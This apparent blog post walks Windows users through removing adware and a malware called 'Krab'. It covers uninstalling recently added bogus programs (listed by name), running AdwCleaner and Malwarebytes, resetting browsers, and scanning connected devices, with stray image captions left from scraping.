step1Let’s say you are on Windows. Open the Control Panel. Then, select Program and Uninstall.  Try to bear with all the pop-up boxes and not click anything.  Once the list of programs appears, click on the Date column to bring up items most recently added. You should see a list of at least 12 or so from when you did your download.  Some will say “Optimizer”, some will say “Protection”, some will say “Best deals”.  They are all bogus.  You want NONE of them. Start by selecting each one and clicking Uninstall.  You can agree to using the program’s own uninstaller remove it. That’s normal. And the best way to get rid of them.  Here’s what I tossed in the trash:

  • Remote Desktop Access VuuPC\
  • PepperZip
  • Optimizer Pro
  • StormWatch
  • Search Protection
  • My PC Backup
  • Surfkeepit
  • eDeals
  • SPT System Updater Service
  • Word Prozer
  • HQ ProVideo
  • Fast Player

Yes, they may sound legit.  But they all had today’s date stamp, and some of them were particularly nasty malware/adware.  As the song says “Don’t Get Fooled Again!”

STEP 2: Remove Adware using ADWCleaner

adwYou may be able to access your browser at this point. If you can, go to this site: ADWCLEANER DOWNLOAD LINK to download an effective Adware cleaner.

Follow the instructions and install. Click on the “Scan” button and then click “Clean”.  You’ll have to reboot.

 

STEP 3: Remove program files with MalwareBytes

malbytesNow, you  need a program to go after the virus, Krab in this case. Download  MALWAREBYTES ANTI-MALWARE. Follow the prompts and install the free version.

 

 

 If prompted, click the green “Fix now” box to start the scan.

malbyte2You may be prompted to upload updates. Click agree.   The program will scan, you can watch the progress, and when it’s done you’ll be notified.  The dangerous files will be quarantined, and expect to be asked to reboot. Say yes.

 

STEP 4: Clean your Browsers

google1You will probably notice a delightful lack of pop-ups this time. But you’re not in the clear yet. You need to clean your browsers now.  Follow these steps as outlined.

If you use Internet Explorer, click on the right corner gear icon for Settings. From the drop down box, click Internet Options.

 

 

google2

In the next box, click on the “Advanced” tab. Click on the “Reset” button. In the next box, select “Delete Personal Settings” and click “Reset”. When Explorer is finished, click close.

 

 

 

 

 

googleFor Google Chrome, click this symbol at the top right: symbol. Then, click on “Tools” and then “Extensions”.

 

 

 

In the Extensions tab, you’ll see Krab Web and other items, some which you don’t recognize. Click on the trash can icon beside those you want to remove. If you didn’t install it, delete it. extensions

 

STEP 5: Check the Spread

A note of caution: Malware spreads with physical contact so you need to check any other devices you’ve connected to your computer, like USB or flash drives, tablets, or even your phone.  Run a scan using your anti-virus and Malware Bytes.Trust me – you’ll be glad you did. Now you’re clean and protected. Surf safe!

** A big thank you to MalwareTips.com and their helpful site